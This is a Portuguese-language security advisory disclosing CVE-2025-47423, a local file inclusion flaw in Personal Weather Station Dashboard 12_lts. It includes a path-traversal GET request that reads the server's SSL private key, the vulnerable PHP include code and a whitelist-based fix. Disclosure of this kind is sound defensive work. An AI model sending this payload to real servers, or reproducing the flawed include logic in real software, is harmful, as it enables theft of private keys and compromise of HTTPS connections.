
Divulgação detalhada da CVE-2025-47423: Inclusão de Arquivo Local no Personal Weather Station Dashboard 12_lts. Inclui PoC, análise de código vulnerável e recomendações de correção segura para aprendizado defensivo.
Descoberto por: Matthew Eagle
Status: Divulgação Pública
Data do Relato: 2025-05-05
ID CVE: CVE-2025-47423
Uma vulnerabilidade de Inclusão de Arquivo Local (LFI) no Personal Weather Station Dashboard versão 12_lts permite que atacantes remotos não autenticados leiam arquivos arbitrários no servidor. Explorar esta falha concede acesso a arquivos sensíveis, incluindo chaves SSL privadas, comprometendo potencialmente a confidencialidade e integridade das conexões HTTPS.
/others/_test.phptest (via GET)Esta falha permite que atacantes remotos:
server.key)CVSS: 5.8 Médio
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com
Resposta:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);
A função str_replace é insuficiente para prevenir travessia de diretório.
basename() e verifique contra arquivos permitidos$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';
if (!in_array($script, $allowed_tests)) {
die("Arquivo de teste inválido.");
}
include(__DIR__ . '/scripts/' . $script);
| Data | Evento |
|---|---|
| 2025-05-05 | Vulnerabilidade reportada aos moderadores do PWS Dashboard |
| 2025-05-06 | Reconhecimento e testes observados |
| 2025-05-07 | CVE-2025-47423 reservado via MITRE |
| TBD | Correção pública e listagem CVE pendente |
Se você está executando Personal Weather Station Dashboard 12_lts, você deve:
_test.phpVulnerabilidade descoberta e divulgada de forma responsável por Matthew Eagle
Contato: [email protected]
Divulgação coordenada em respeito às diretrizes de divulgação responsável. Este documento é divulgado para fins educacionais e defensivos.